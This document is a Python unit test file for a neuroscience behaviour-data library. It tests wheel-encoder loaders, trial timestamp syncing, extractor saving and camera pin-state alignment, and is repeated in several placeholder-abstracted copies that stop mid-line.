raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = 